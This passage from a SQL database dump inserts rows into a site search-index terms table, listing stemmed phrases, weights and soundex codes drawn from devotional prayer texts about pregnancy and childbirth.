(221324, 'and night that', 'and night that', 0, 1, 1.4667, 'A53523', 1, '*'),
(221325, 'and not cause', 'and not cause', 0, 1, 1.4333, 'A53532', 1, '*'),
(221326, 'and other children', 'and other children', 0, 1, 1.6, 'A53624365', 1, '*'),
(221327, 'and outer', 'and outer', 0, 1, 1.3, 'A536', 1, '*'),
(221328, 'and outer man', 'and outer man', 0, 1, 1.4333, 'A5365', 1, '*'),
(221329, 'and said i', 'and said i', 0, 1, 1.3333, 'A5323', 2, '*'),
(221330, 'and she', 'and she', 0, 1, 1.2333, 'A532', 4, '*'),
(221331, 'and she conceived', 'and she conceived', 0, 1, 1.5667, 'A5325213', 1, '*'),
(221332, 'and shut', 'and shut', 0, 1, 1.2667, 'A5323', 1, '*'),
(221333, 'and shut the', 'and shut the', 0, 1, 1.4, 'A5323', 1, '*'),
(221334, 'and strong deut', 'and strong deut', 0, 1, 1.5, 'A53236523', 1, '*'),
(221335, 'and that my', 'and that my', 0, 1, 1.3667, 'A535', 1, '*'),
(221336, 'and then thou', 'and then thou', 0, 1, 1.4333, 'A5353', 1, '*'),
(221337, 'and thereafter', 'and thereafter', 0, 1, 1.4667, 'A536136', 1, '*'),
(221338, 'and thereafter i', 'and thereafter i', 0, 1, 1.5333, 'A536136', 1, '*'),
(221339, 'and thine health', 'and thine health', 0, 1, 1.5333, 'A53543', 1, '*'),
(221340, 'and thy conception', 'and thy conception', 0, 1, 1.6, 'A53252135', 1, '*'),
(221341, 'and thy desire', 'and thy desire', 0, 1, 1.4667, 'A5326', 1, '*'),
(221342, 'and thy righteousness', 'and thy righteousness', 0, 1, 1.7, 'A53623252', 1, '*'),
(221343, 'and triumph', 'and triumph', 0, 1, 1.3667, 'A53651', 1, '*'),
(221344, 'and triumph against', 'and triumph against', 0, 1, 1.6333, 'A536512523', 1, '*'),
(221345, 'and well', 'and well', 0, 1, 1.2667, 'A534', 1, '*'),
(221346, 'and well conclusion', 'and well conclusion', 0, 1, 1.6333, 'A534252425', 1, '*'),
(221347, 'and well my', 'and well my', 0, 1, 1.3667, 'A5345', 1, '*'),
(221348, 'and whatsoever', 'and whatsoever', 0, 1, 1.4667, 'A53216', 1, '*'),
(221349, 'and whatsoever he', 'and whatsoever he', 0, 1, 1.5667, 'A53216', 1, '*'),
(221350, 'and when she', 'and when she', 0, 1, 1.4, 'A5352', 2, '*'),
(221351, 'and wonderfully', 'and wonderfully', 0, 1, 1.5, 'A5353614', 1, '*'),
(221352, 'and wonderfully made', 'and wonderfully made', 0, 1, 1.6667, 'A535361453', 1, '*'),
(221353, 'any demonic', 'ani demonic', 0, 1, 1.3667, 'A5352', 1, '*'),
(221354, 'any demonic harassment', 'ani demonic harassment', 0, 1, 1.7333, 'A53526253', 1, '*'),
(221355, 'are accomplished', 'ar accomplished', 0, 1, 1.5333, 'A6251423', 1, '*'),
(221356, 'are accomplished psalm', 'ar accomplished psalm', 0, 1, 1.7333, 'A62514231245', 1, '*'),
(221357, 'are delivered', 'ar delivered', 0, 1, 1.4333, 'A634163', 1, '*'),
(221358, 'are delivered ere', 'ar delivered ere', 0, 1, 1.5667, 'A6341636', 1, '*'),
(221359, 'are fulfilled', 'ar fulfilled', 0, 1, 1.4333, 'A614143', 1, '*'),
(221360, 'are fulfilled in', 'ar fulfilled in', 0, 1, 1.5333, 'A6141435', 1, '*'),
(221361, 'are life', 'ar life', 0, 1, 1.2667, 'A641', 1, '*'),
(221362, 'are life unto', 'ar life unto', 0, 1, 1.4333, 'A64153', 1, '*'),
(221363, 'are lively', 'ar lively', 0, 1, 1.3333, 'A6414', 1, '*'),
(221364, 'are lively and', 'ar lively and', 0, 1, 1.4667, 'A641453', 1, '*'),
(221365, 'are more in', 'ar more in', 0, 1, 1.3667, 'A6565', 1, '*'),
(221366, 'are not as', 'ar not as', 0, 1, 1.3333, 'A6532', 1, '*'),
(221367, 'are thy', 'ar thy', 0, 1, 1.2333, 'A630', 1, '*'),
(221368, 'are thy thoughts', 'ar thy thoughts', 0, 1, 1.5333, 'A63232', 1, '*'),
(221369, 'are thy works', 'ar thy works', 0, 1, 1.4333, 'A6362', 1, '*'),
(221370, 'as i', 'as i', 0, 1, 1.1333, 'A200', 1, '*'),
(221371, 'as i travail', 'as i travail', 0, 1, 1.4, 'A23614', 1, '*'),
(221372, 'as soon', 'as soon', 0, 1, 1.2333, 'A250', 1, '*'),
(221373, 'as soon as', 'as soon as', 0, 1, 1.3333, 'A252', 1, '*'),
(221374, 'as the egyptian', 'as the egyptian', 0, 1, 1.5, 'A232135', 1, '*'),
(221375, 'as the morning', 'as the morning', 0, 1, 1.4667, 'A235652', 1, '*'),
(221376, 'as the voice', 'as the voice', 0, 1, 1.4, 'A2312', 1, '*'),
(221377, 'as yet', 'as yet', 0, 1, 1.2, 'A230', 1, '*'),
(221378, 'as yet there', 'as yet there', 0, 1, 1.4, 'A236', 1, '*'),
(221379, 'as zion', 'as zion', 0, 1, 1.2333, 'A250', 1, '*'),
(221380, 'as zion travailed', 'as zion travailed', 0, 1, 1.5667, 'A2536143', 1, '*'),
(221381, 'at delivery', 'at delivery', 0, 1, 1.3667, 'A3416', 1, '*'),
(221382, 'at delivery as', 'at delivery as', 0, 1, 1.4667, 'A34162', 1, '*'),
(221383, 'at least', 'at least', 0, 1, 1.2667, 'A3423', 2, '*'),
(221384, 'at least 3', 'at least 3', 0, 1, 1.3333, 'A3423', 1, '*'),
(221385, 'at once for', 'at once for', 0, 1, 1.3667, 'A35216', 1, '*'),
(221386, 'attend to', 'attend to', 0, 1, 1.3, 'A353', 1, '*'),
(221387, 'attend to me', 'attend to me', 0, 1, 1.4, 'A3535', 1, '*'),
(221388, 'attend to my', 'attend to my', 0, 1, 1.4, 'A3535', 1, '*'),
(221389, 'awake', 'awak', 0, 0, 0.3333, 'A200', 1, '*'),
(221390, 'awake i', 'awak i', 0, 1, 1.2333, 'A200', 1, '*'),
(221391, 'awake i am', 'awak i am', 0, 1, 1.3333, 'A250', 1, '*'),
(221392, 'babe', 'babe', 0, 0, 0.2667, 'B000', 1, '*'),
(221393, 'babe leaped', 'babe leaped', 0, 1, 1.3667, 'B413', 1, '*'),
(221394, 'babe leaped in', 'babe leaped in', 0, 1, 1.4667, 'B4135', 1, '*'),
(221395, 'baby', 'babi', 0, 0, 0.2667, 'B000', 1, '*'),
(221396, 'baby and', 'babi and', 0, 1, 1.2667, 'B530', 1, '*'),
(221397, 'baby and other', 'babi and other', 0, 1, 1.4667, 'B536', 1, '*'),
(221398, 'baby from', 'babi from', 0, 1, 1.3, 'B650', 1, '*'),
(221399, 'baby from my', 'babi from my', 0, 1, 1.4, 'B650', 1, '*'),
(221400, 'baby grows', 'babi grows', 0, 1, 1.3333, 'B262', 1, '*'),
(221401, 'baby grows perfectly', 'babi grows perfectly', 0, 1, 1.6667, 'B262161234', 1, '*'),
(221402, 'baby is', 'babi is', 0, 1, 1.2333, 'B200', 1, '*'),
(221403, 'baby is a', 'babi is a', 0, 1, 1.3, 'B200', 1, '*'),
(221404, 'baby is empowered', 'babi is empowered', 0, 1, 1.5667, 'B25163', 1, '*'),
(221405, 'baby is physically', 'babi is physically', 0, 1, 1.6, 'B2124', 1, '*'),
(221406, 'baby sucks', 'babi sucks', 0, 1, 1.3333, 'B200', 1, '*'),
(221407, 'baby sucks well', 'babi sucks well', 0, 1, 1.5, 'B240', 1, '*'),
(221408, 'baby up', 'babi up', 0, 1, 1.2333, 'B000', 1, '*'),
(221409, 'baby up to', 'babi up to', 0, 1, 1.3333, 'B300', 1, '*'),
(221410, 'baby\'s', 'babi', 0, 0, 0.4, 'B200', 1, '*'),
(221411, 'baby\'s experience', 'babi experience', 0, 1, 1.5667, 'B21652', 1, '*'),
(221412, 'baby\'s experience formed', 'babi experience formed', 0, 1, 1.8, 'B216521653', 1, '*'),
(221413, 'back pains', 'back pains', 0, 1, 1.3333, 'B2152', 1, '*'),
(221414, 'back pains i', 'back pains i', 0, 1, 1.4, 'B2152', 1, '*'),
(221415, 'bare', 'bare', 0, 0, 0.2667, 'B600', 1, '*'),
(221416, 'bare no', 'bare no', 0, 1, 1.2333, 'B650', 1, '*'),
(221417, 'bare no miscarriage', 'bare no miscarriage', 0, 1, 1.6333, 'B65262', 1, '*'),
(221418, 'bare so', 'bare so', 0, 1, 1.2333, 'B620', 1, '*'),
(221419, 'bare so do', 'bare so do', 0, 1, 1.3333, 'B623', 1, '*'),
(221420, 'barren', 'barren', 0, 0, 0.4, 'B650', 1, '*'),
(221421, 'barren in', 'barren in', 0, 1, 1.3, 'B650', 1, '*'),
(221422, 'barren in thy', 'barren in thy', 0, 1, 1.4333, 'B653', 1, '*'),
(221423, 'be a joyful', 'be a joyful', 0, 1, 1.3667, 'B214', 1, '*'),
(221424, 'be barren', 'be barren', 0, 1, 1.3, 'B650', 1, '*'),
(221425, 'be barren in', 'be barren in', 0, 1, 1.4, 'B650', 1, '*'),
(221426, 'be born at', 'be born at', 0, 1, 1.3333, 'B653', 1, '*'),
(221427, 'be delighted', 'be delighted', 0, 1, 1.4, 'B3423', 1, '*'),
(221428, 'be delighted with', 'be delighted with', 0, 1, 1.5667, 'B3423', 1, '*'),
(221429, 'be delivered', 'be delivered', 0, 1, 1.4, 'B34163', 1, '*'),
(221430, 'be delivered are', 'be delivered are', 0, 1, 1.5333, 'B341636', 1, '*'),
(221431, 'be delivered were', 'be delivered were', 0, 1, 1.5667, 'B341636', 1, '*'),
(221432, 'be easy', 'be easy', 0, 1, 1.2333, 'B200', 1, '*'),
(221433, 'be easy for', 'be easy for', 0, 1, 1.3667, 'B216', 1, '*'),
(221434, 'be like a', 'be like a', 0, 1, 1.3, 'B420', 1, '*'),
(221435, 'be made to', 'be made to', 0, 1, 1.3333, 'B530', 1, '*'),
(221436, 'be more you', 'be more you', 0, 1, 1.3667, 'B560', 1, '*'),
(221437, 'be satisfied', 'be satisfied', 0, 1, 1.4, 'B23213', 1, '*'),
(221438, 'be satisfied with', 'be satisfied with', 0, 1, 1.5667, 'B23213', 1, '*'),
(221439, 'be the fruit', 'be the fruit', 0, 1, 1.4, 'B3163', 1, '*'),
(221440, 'be thy', 'be thy', 0, 1, 1.2, 'B300', 1, '*'),
(221441, 'be thy reward.”', 'be thy reward.”', 0, 1, 1.5, 'B363', 1, '*'),
(221442, 'be to thy', 'be to thy', 0, 1, 1.3, 'B300', 1, '*'),
(221443, 'bears', 'bear', 0, 0, 0.3333, 'B620', 3, '*'),
(221444, 'bears cain', 'bear cain', 0, 1, 1.3333, 'B625', 1, '*'),
(221445, 'bears cain and', 'bear cain and', 0, 1, 1.4667, 'B6253', 1, '*'),
(221446, 'because the hebrew', 'becaus the hebrew', 0, 1, 1.6, 'B2316', 1, '*'),
(221447, 'before during', 'befor during', 0, 1, 1.4333, 'B63652', 1, '*'),
(221448, 'before during and', 'befor during and', 0, 1, 1.5667, 'B6365253', 1, '*'),
(221449, 'before her', 'befor her', 0, 1, 1.3333, 'B600', 1, '*'),
(221450, 'before her pain', 'befor her pain', 0, 1, 1.5, 'B615', 1, '*'),
(221451, 'before pregnancy', 'befor pregnancy', 0, 1, 1.5333, 'B616252', 1, '*'),
(221452, 'before pregnancy .”', 'befor pregnancy .”', 0, 1, 1.6333, 'B616252', 1, '*'),
(221453, 'before the time', 'befor the time', 0, 1, 1.5, 'B635', 1, '*'),
(221454, 'before thee', 'befor thee', 0, 1, 1.3667, 'B630', 1, '*'),
(221455, 'before thee the', 'befor thee the', 0, 1, 1.5, 'B630', 1, '*'),
(221456, 'behold there', 'behold there', 0, 1, 1.4, 'B436', 1, '*'),
(221457, 'behold there were', 'behold there were', 0, 1, 1.5667, 'B436', 1, '*'),
(221458, 'being made', 'be made', 0, 1, 1.3333, 'B5253', 1, '*'),
(221459, 'being made a', 'be made a', 0, 1, 1.4, 'B5253', 1, '*'),
(221460, 'being pale', 'be pale', 0, 1, 1.3333, 'B5214', 1, '*'),
(221461, 'being pale i', 'be pale i', 0, 1, 1.4, 'B5214', 1, '*'),
(221462, 'being unperfect', 'be unperfect', 0, 1, 1.5, 'B52516123', 1, '*'),
(221463, 'being unperfect and', 'be unperfect and', 0, 1, 1.6333, 'B5251612353', 1, '*'),
(221464, 'birth and', 'birth and', 0, 1, 1.3, 'B6353', 1, '*'),
(221465, 'birth and i', 'birth and i', 0, 1, 1.3667, 'B6353', 1, '*'),
(221466, 'birth and not', 'birth and not', 0, 1, 1.4333, 'B635353', 1, '*'),
(221467, 'birth in', 'birth in', 0, 1, 1.2667, 'B635', 1, '*'),
(221468, 'birth in jesus', 'birth in jesus', 0, 1, 1.4667, 'B6352', 1, '*'),
(221469, 'blessed in', 'bless in', 0, 1, 1.3333, 'B4235', 1, '*'),
(221470, 'blessed in jesus', 'bless in jesus', 0, 1, 1.5333, 'B42352', 1, '*'),
(221471, 'blessed my', 'bless my', 0, 1, 1.3333, 'B4235', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(221472, 'blessed my baby', 'bless my baby', 0, 1, 1.5, 'B42351', 1, '*'),
(221473, 'bloody', 'bloodi', 0, 0, 0.4, 'B430', 1, '*'),
(221474, 'bloody men.”', 'bloodi men.”', 0, 1, 1.4, 'B435', 1, '*'),
(221475, 'bloody men.” this', 'bloodi men.” this', 0, 1, 1.5667, 'B43532', 1, '*'),
(221476, 'body ..”', 'bodi ..”', 0, 1, 1.2667, 'B300', 1, '*'),
(221477, 'body ..” the', 'bodi ..” the', 0, 1, 1.4, 'B300', 1, '*'),
(221478, 'body back', 'bodi back', 0, 1, 1.3, 'B312', 1, '*'),
(221479, 'body back pains', 'bodi back pains', 0, 1, 1.5, 'B312152', 1, '*'),
(221480, 'body is', 'bodi is', 0, 1, 1.2333, 'B320', 1, '*'),
(221481, 'body is blessed', 'bodi is blessed', 0, 1, 1.5, 'B321423', 1, '*'),
(221482, 'body,”', 'body,”', 0, 0, 0.4, 'B300', 1, '*'),
(221483, 'body,” 11a-”and', 'body,” 11a-”and', 0, 1, 1.5, 'B353', 1, '*'),
(221484, 'body,” 11a-”and the', 'body,” 11a-”and the', 0, 1, 1.6333, 'B353', 1, '*'),
(221485, 'book all', 'book all', 0, 1, 1.2667, 'B240', 1, '*'),
(221486, 'book all my', 'book all my', 0, 1, 1.3667, 'B245', 1, '*'),
(221487, 'book of the', 'book of the', 0, 1, 1.3667, 'B213', 1, '*'),
(221488, 'born at', 'born at', 0, 1, 1.2333, 'B653', 1, '*'),
(221489, 'born at once', 'born at once', 0, 1, 1.4, 'B65352', 1, '*'),
(221490, 'both in', 'both in', 0, 1, 1.2333, 'B350', 2, '*'),
(221491, 'both in the', 'both in the', 0, 1, 1.3667, 'B353', 1, '*'),
(221492, 'break forth', 'break forth', 0, 1, 1.3667, 'B62163', 1, '*'),
(221493, 'break forth as', 'break forth as', 0, 1, 1.4667, 'B621632', 1, '*'),
(221494, 'breast', 'breast', 0, 0, 0.4, 'B623', 1, '*'),
(221495, 'breast milk', 'breast milk', 0, 1, 1.3667, 'B623542', 1, '*'),
(221496, 'breast milk in', 'breast milk in', 0, 1, 1.4667, 'B6235425', 1, '*'),
(221497, 'breasts', 'breast', 0, 0, 0.4667, 'B6232', 1, '*'),
(221498, 'breasts of', 'breast of', 0, 1, 1.3333, 'B62321', 1, '*'),
(221499, 'breasts of her', 'breast of her', 0, 1, 1.4667, 'B623216', 1, '*'),
(221500, 'bring forth and', 'bring forth and', 0, 1, 1.5, 'B65216353', 1, '*'),
(221501, 'bring forth children', 'bring forth children', 0, 1, 1.6667, 'B65216324365', 1, '*'),
(221502, 'bring forth i', 'bring forth i', 0, 1, 1.4333, 'B652163', 1, '*'),
(221503, 'bring forth in', 'bring forth in', 0, 1, 1.4667, 'B6521635', 1, '*'),
(221504, 'bring forth saith', 'bring forth saith', 0, 1, 1.5667, 'B65216323', 1, '*'),
(221505, 'bring to', 'bring to', 0, 1, 1.2667, 'B6523', 1, '*'),
(221506, 'bring to the', 'bring to the', 0, 1, 1.4, 'B6523', 1, '*'),
(221507, 'bringeth', 'bringeth', 0, 0, 0.5333, 'B6523', 1, '*'),
(221508, 'bringeth forth', 'bringeth forth', 0, 1, 1.4667, 'B6523163', 1, '*'),
(221509, 'bringeth forth his', 'bringeth forth his', 0, 1, 1.6, 'B65231632', 1, '*'),
(221510, 'brought forth before', 'brought forth before', 0, 1, 1.6667, 'B62316316', 1, '*'),
(221511, 'brought forth her', 'brought forth her', 0, 1, 1.5667, 'B6231636', 1, '*'),
(221512, 'but thou', 'but thou', 0, 1, 1.2667, 'B300', 1, '*'),
(221513, 'but thou shalt', 'but thou shalt', 0, 1, 1.4667, 'B3243', 1, '*'),
(221514, 'by god', 'by god', 0, 1, 1.2, 'B230', 1, '*'),
(221515, 'by god in', 'by god in', 0, 1, 1.3, 'B235', 1, '*'),
(221516, 'by his grace”', 'by his grace”', 0, 1, 1.4333, 'B262', 1, '*'),
(221517, 'by the rivers', 'by the rivers', 0, 1, 1.4333, 'B36162', 1, '*'),
(221518, 'cain', 'cain', 0, 0, 0.2667, 'C500', 2, '*'),
(221519, 'cain and', 'cain and', 0, 1, 1.2667, 'C530', 1, '*'),
(221520, 'cain and said', 'cain and said', 0, 1, 1.4333, 'C5323', 1, '*'),
(221521, 'called me', 'call me', 0, 1, 1.3, 'C435', 2, '*'),
(221522, 'called me by', 'call me by', 0, 1, 1.4, 'C4351', 1, '*'),
(221523, 'came she', 'came she', 0, 1, 1.2667, 'C520', 1, '*'),
(221524, 'came she was', 'came she was', 0, 1, 1.4, 'C520', 1, '*'),
(221525, 'came to pass', 'came to pass', 0, 1, 1.4, 'C5312', 1, '*'),
(221526, 'can be more', 'can be more', 0, 1, 1.3667, 'C5156', 1, '*'),
(221527, 'can do all', 'can do all', 0, 1, 1.3333, 'C534', 1, '*'),
(221528, 'can even', 'can even', 0, 1, 1.2667, 'C515', 1, '*'),
(221529, 'can even start', 'can even start', 0, 1, 1.4667, 'C5152363', 1, '*'),
(221530, 'carry the baby', 'carri the baby', 0, 1, 1.4667, 'C631', 1, '*'),
(221531, 'case in jesus', 'case in jesus', 0, 1, 1.4333, 'C520', 1, '*'),
(221532, 'cast my', 'cast my', 0, 1, 1.2333, 'C350', 1, '*'),
(221533, 'cast my young', 'cast my young', 0, 1, 1.4333, 'C352', 1, '*'),
(221534, 'cast their', 'cast their', 0, 1, 1.3333, 'C360', 1, '*'),
(221535, 'cast their young', 'cast their young', 0, 1, 1.5333, 'C3652', 1, '*'),
(221536, 'cause to', 'caus to', 0, 1, 1.2667, 'C300', 1, '*'),
(221537, 'cause to bring', 'caus to bring', 0, 1, 1.4667, 'C31652', 1, '*'),
(221538, 'child a', 'child a', 0, 1, 1.2333, 'C430', 1, '*'),
(221539, 'child a child', 'child a child', 0, 1, 1.4333, 'C43243', 1, '*'),
(221540, 'child i', 'child i', 0, 1, 1.2333, 'C430', 1, '*'),
(221541, 'child i have', 'child i have', 0, 1, 1.4, 'C431', 1, '*'),
(221542, 'child of destiny', 'child of destiny', 0, 1, 1.5333, 'C4313235', 1, '*'),
(221543, 'child she', 'child she', 0, 1, 1.3, 'C432', 1, '*'),
(221544, 'child she hid', 'child she hid', 0, 1, 1.4333, 'C4323', 1, '*'),
(221545, 'childbirth', 'childbirth', 0, 0, 0.6667, 'C43163', 1, '*'),
(221546, 'childbirth i', 'childbirth i', 0, 1, 1.4, 'C43163', 1, '*'),
(221547, 'childbirth i reject', 'childbirth i reject', 0, 1, 1.6333, 'C43163623', 1, '*'),
(221548, 'children and thy', 'children and thy', 0, 1, 1.5333, 'C43653', 1, '*'),
(221549, 'children i', 'children i', 0, 1, 1.3333, 'C4365', 1, '*'),
(221550, 'children i am', 'children i am', 0, 1, 1.4333, 'C4365', 1, '*'),
(221551, 'children i have', 'children i have', 0, 1, 1.5, 'C43651', 1, '*'),
(221552, 'children praise', 'children praise', 0, 1, 1.5, 'C4365162', 1, '*'),
(221553, 'children praise ye', 'children praise ye', 0, 1, 1.6, 'C4365162', 1, '*'),
(221554, 'children.”', 'children.”', 0, 0, 0.6667, 'C4365', 1, '*'),
(221555, 'children.” i', 'children.” i', 0, 1, 1.4, 'C4365', 1, '*'),
(221556, 'children.” i reject', 'children.” i reject', 0, 1, 1.6333, 'C4365623', 1, '*'),
(221557, 'christ has', 'christ has', 0, 1, 1.3333, 'C6232', 1, '*'),
(221558, 'christ has redeemed', 'christ has redeemed', 0, 1, 1.6333, 'C62326353', 1, '*'),
(221559, 'christ jesus isaiah', 'christ jesus isaiah', 0, 1, 1.6333, 'C6232', 1, '*'),
(221560, 'christ that strengthens', 'christ that strengthens', 0, 1, 1.7667, 'C62323652352', 1, '*'),
(221561, 'christ which strengtheneth', 'christ which strengtheneth', 0, 1, 1.8667, 'C62323652353', 1, '*'),
(221562, 'come against', 'come against', 0, 1, 1.4, 'C52523', 1, '*'),
(221563, 'come against every', 'come against every', 0, 1, 1.6, 'C5252316', 1, '*'),
(221564, 'come in unto', 'come in unto', 0, 1, 1.4, 'C530', 1, '*'),
(221565, 'comes out-by', 'come out-by', 0, 1, 1.4, 'C5231', 1, '*'),
(221566, 'comes out-by himself', 'come out-by himself', 0, 1, 1.6667, 'C52315241', 1, '*'),
(221567, 'complications', 'complic', 0, 0, 0.8667, 'C5142352', 1, '*'),
(221568, 'complications in', 'complic in', 0, 1, 1.5333, 'C51423525', 1, '*'),
(221569, 'complications in jesus', 'complic in jesus', 0, 1, 1.7333, 'C514235252', 1, '*'),
(221570, 'conceive', 'conceiv', 0, 0, 0.5333, 'C521', 1, '*'),
(221571, 'conceive and', 'conceiv and', 0, 1, 1.4, 'C52153', 1, '*'),
(221572, 'conceive and i', 'conceiv and i', 0, 1, 1.4667, 'C52153', 1, '*'),
(221573, 'conceived', 'conceiv', 0, 0, 0.6, 'C5213', 1, '*'),
(221574, 'conceived and', 'conceiv and', 0, 1, 1.4333, 'C521353', 1, '*'),
(221575, 'conceived and bare', 'conceiv and bare', 0, 1, 1.6, 'C52135316', 1, '*'),
(221576, 'conceived and bears', 'conceiv and bears', 0, 1, 1.6333, 'C521353162', 1, '*'),
(221577, 'conception in', 'concept in', 0, 1, 1.4333, 'C52135', 1, '*'),
(221578, 'conception in sorrow', 'concept in sorrow', 0, 1, 1.6667, 'C5213526', 1, '*'),
(221579, 'conclusion joshua', 'conclus joshua', 0, 1, 1.5667, 'C524252', 1, '*'),
(221580, 'conclusion joshua 1', 'conclus joshua 1', 0, 1, 1.6333, 'C524252', 1, '*'),
(221581, 'confession at', 'confess at', 0, 1, 1.4333, 'C51253', 1, '*'),
(221582, 'confession at least', 'confess at least', 0, 1, 1.6333, 'C51253423', 1, '*'),
(221583, 'confession for', 'confess for', 0, 1, 1.4667, 'C512516', 1, '*'),
(221584, 'confession for pregnant', 'confess for pregnant', 0, 1, 1.7667, 'C51251616253', 1, '*'),
(221585, 'consolations', 'consol', 0, 0, 0.8, 'C524352', 1, '*'),
(221586, 'consolations that', 'consol that', 0, 1, 1.5667, 'C5243523', 1, '*'),
(221587, 'consolations that ye', 'consol that ye', 0, 1, 1.6667, 'C5243523', 1, '*'),
(221588, 'continuance', 'continu', 0, 0, 0.7333, 'C5352', 1, '*'),
(221589, 'continuance were', 'continu were', 0, 1, 1.5333, 'C53526', 1, '*'),
(221590, 'continuance were fashioned', 'continu were fashioned', 0, 1, 1.8667, 'C535261253', 1, '*'),
(221591, 'count', 'count', 0, 0, 0.3333, 'C530', 1, '*'),
(221592, 'count them', 'count them', 0, 1, 1.3333, 'C535', 1, '*'),
(221593, 'count them they', 'count them they', 0, 1, 1.5, 'C5353', 1, '*'),
(221594, 'covenant i', 'coven i', 0, 1, 1.3333, 'C153', 1, '*'),
(221595, 'covenant i deliver', 'coven i deliver', 0, 1, 1.6, 'C153416', 1, '*'),
(221596, 'covered me', 'cover me', 0, 1, 1.3333, 'C1635', 1, '*'),
(221597, 'covered me in', 'cover me in', 0, 1, 1.4333, 'C1635', 1, '*'),
(221598, 'curiously', 'curious', 0, 0, 0.6, 'C624', 1, '*'),
(221599, 'curiously wrought', 'curious wrought', 0, 1, 1.5667, 'C624623', 1, '*'),
(221600, 'curiously wrought in', 'curious wrought in', 0, 1, 1.6667, 'C6246235', 1, '*'),
(221601, 'curse for', 'curs for', 0, 1, 1.3, 'C6216', 1, '*'),
(221602, 'curse for us', 'curs for us', 0, 1, 1.4, 'C62162', 1, '*'),
(221603, 'curse of', 'curs of', 0, 1, 1.2667, 'C621', 1, '*'),
(221604, 'curse of the', 'curs of the', 0, 1, 1.4, 'C6213', 1, '*'),
(221605, 'cursed is', 'curs is', 0, 1, 1.3, 'C6232', 1, '*'),
(221606, 'cursed is every', 'curs is every', 0, 1, 1.5, 'C623216', 1, '*'),
(221607, 'cut short', 'cut short', 0, 1, 1.3, 'C3263', 1, '*'),
(221608, 'cut short for', 'cut short for', 0, 1, 1.4333, 'C326316', 1, '*'),
(221609, 'daily confession', 'daili confession', 0, 1, 1.5333, 'D425125', 1, '*'),
(221610, 'daily confession at', 'daili confession at', 0, 1, 1.6333, 'D4251253', 1, '*'),
(221611, 'daily morning', 'daili morning', 0, 1, 1.4333, 'D45652', 1, '*'),
(221612, 'daily morning afternoon', 'daili morning afternoon', 0, 1, 1.7667, 'D456521365', 1, '*'),
(221613, 'day and', 'dai and', 0, 1, 1.2333, 'D530', 1, '*'),
(221614, 'day and night', 'dai and night', 0, 1, 1.4333, 'D53523', 1, '*'),
(221615, 'day or', 'dai or', 0, 1, 1.2, 'D600', 1, '*'),
(221616, 'days are', 'dai are', 0, 1, 1.2667, 'D260', 1, '*'),
(221617, 'days are accomplished', 'dai are accomplished', 0, 1, 1.7, 'D26251423', 1, '*'),
(221618, 'days i', 'dai i', 0, 1, 1.2, 'D200', 1, '*'),
(221619, 'days i will', 'dai i will', 0, 1, 1.3667, 'D240', 1, '*'),
(221620, 'days to be', 'dai to be', 0, 1, 1.3333, 'D231', 1, '*'),
(221621, 'declare that it', 'declar that it', 0, 1, 1.5, 'D2463', 1, '*'),
(221622, 'deformity', 'deform', 0, 0, 0.6, 'D1653', 1, '*'),
(221623, 'deformity isaiah', 'deform isaiah', 0, 1, 1.5333, 'D16532', 1, '*'),
(221624, 'deformity isaiah 58', 'deform isaiah 58', 0, 1, 1.6333, 'D16532', 1, '*'),
(221625, 'delay at', 'delai at', 0, 1, 1.2667, 'D430', 1, '*'),
(221626, 'delay at delivery', 'delai at delivery', 0, 1, 1.5667, 'D43416', 1, '*'),
(221627, 'delay in', 'delai in', 0, 1, 1.2667, 'D450', 1, '*'),
(221628, 'delay in jesus', 'delai in jesus', 0, 1, 1.4667, 'D452', 1, '*'),
(221629, 'delighted', 'delight', 0, 0, 0.6, 'D423', 1, '*'),
(221630, 'delighted with', 'delight with', 0, 1, 1.4667, 'D423', 1, '*'),
(221631, 'delighted with the', 'delight with the', 0, 1, 1.6, 'D423', 1, '*'),
(221632, 'deliver without', 'deliv without', 0, 1, 1.5, 'D4163', 1, '*'),
(221633, 'deliver without complications', 'deliv without complications', 0, 1, 1.9667, 'D416325142352', 1, '*'),
(221634, 'delivered are', 'deliv are', 0, 1, 1.4333, 'D41636', 1, '*'),
(221635, 'delivered are fulfilled', 'deliv are fulfilled', 0, 1, 1.7667, 'D4163614143', 1, '*'),
(221636, 'delivered ere', 'deliv ere', 0, 1, 1.4333, 'D41636', 1, '*'),
(221637, 'delivered ere the', 'deliv ere the', 0, 1, 1.5667, 'D416363', 1, '*'),
(221638, 'delivered of', 'deliv of', 0, 1, 1.4, 'D41631', 1, '*'),
(221639, 'delivered of a', 'deliv of a', 0, 1, 1.4667, 'D41631', 1, '*'),
(221640, 'delivered were', 'deliv were', 0, 1, 1.4667, 'D41636', 1, '*'),
(221641, 'delivered were fulfilled', 'deliv were fulfilled', 0, 1, 1.8, 'D4163614143', 1, '*'),
(221642, 'delivery and', 'deliveri and', 0, 1, 1.4, 'D41653', 1, '*'),
(221643, 'delivery and thereafter', 'deliveri and thereafter', 0, 1, 1.7667, 'D416536136', 1, '*'),
(221644, 'delivery as', 'deliveri as', 0, 1, 1.3667, 'D4162', 1, '*'),
(221645, 'delivery as i', 'deliveri as i', 0, 1, 1.4333, 'D4162', 1, '*'),
(221646, 'delivery i', 'deliveri i', 0, 1, 1.3333, 'D416', 1, '*'),
(221647, 'delivery i carry', 'deliveri i carry', 0, 1, 1.5333, 'D41626', 1, '*'),
(221648, 'delivery it', 'deliveri it', 0, 1, 1.3667, 'D4163', 1, '*'),
(221649, 'delivery it will', 'deliveri it will', 0, 1, 1.5333, 'D41634', 1, '*'),
(221650, 'delivery they', 'deliveri they', 0, 1, 1.4333, 'D4163', 1, '*'),
(221651, 'delivery they will', 'deliveri they will', 0, 1, 1.6, 'D41634', 1, '*'),
(221652, 'demonic harassment', 'demon harassment', 0, 1, 1.6, 'D526253', 1, '*'),
(221653, 'demonic harassment psalm', 'demon harassment psalm', 0, 1, 1.8, 'D5262531245', 1, '*'),
(221654, 'depart', 'depart', 0, 0, 0.4, 'D163', 1, '*'),
(221655, 'depart from', 'depart from', 0, 1, 1.3667, 'D163165', 1, '*'),
(221656, 'depart from me', 'depart from me', 0, 1, 1.4667, 'D163165', 1, '*'),
(221657, 'depart from thine', 'depart from thine', 0, 1, 1.5667, 'D16316535', 1, '*'),
(221658, 'depart out', 'depart out', 0, 1, 1.3333, 'D163', 1, '*'),
(221659, 'depart out of', 'depart out of', 0, 1, 1.4333, 'D1631', 1, '*'),
(221660, 'desire shall', 'desir shall', 0, 1, 1.4, 'D2624', 1, '*'),
(221661, 'desire shall be', 'desir shall be', 0, 1, 1.5, 'D26241', 1, '*'),
